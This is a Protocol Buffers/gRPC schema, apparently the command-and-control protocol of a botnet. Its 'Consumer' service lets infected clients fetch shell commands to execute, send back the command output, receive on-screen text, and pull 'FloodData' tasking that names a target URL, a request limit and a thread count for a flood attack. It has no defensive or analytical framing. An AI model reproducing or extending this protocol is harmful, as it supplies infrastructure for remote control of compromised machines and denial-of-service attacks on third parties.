ClientData.proto

syntax = "proto3";

package pb;

option go_package="./pb";


message ClientOnScreenData {
    bool ShouldUpdate = 1;
    string OnScreenText = 2;
}

message ClientExecData {
    bool ShouldExec = 1;
    string Command = 2;
}

message ClientExecOutput {
    ClientDataRequest id = 1;
    bytes output = 2;
}

message Void {}

message FloodData { 
    bool ShouldFlood = 1;
    string url = 2;
    int64 limit = 3;
    int64 num_threads = 4;
}

message ClientDataRequest { string client_id = 1; }

message ClientDataOnScreenTextResponse { ClientOnScreenData on_screen = 1; }


service Consumer {
    rpc SubscribeOnScreenText(ClientDataRequest) returns (stream ClientDataOnScreenTextResponse);
    rpc GetCommand(ClientDataRequest) returns (ClientExecData);
    rpc SetCommandOutput(ClientExecOutput) returns (Void);
    rpc GetFlood(Void) returns (FloodData);
}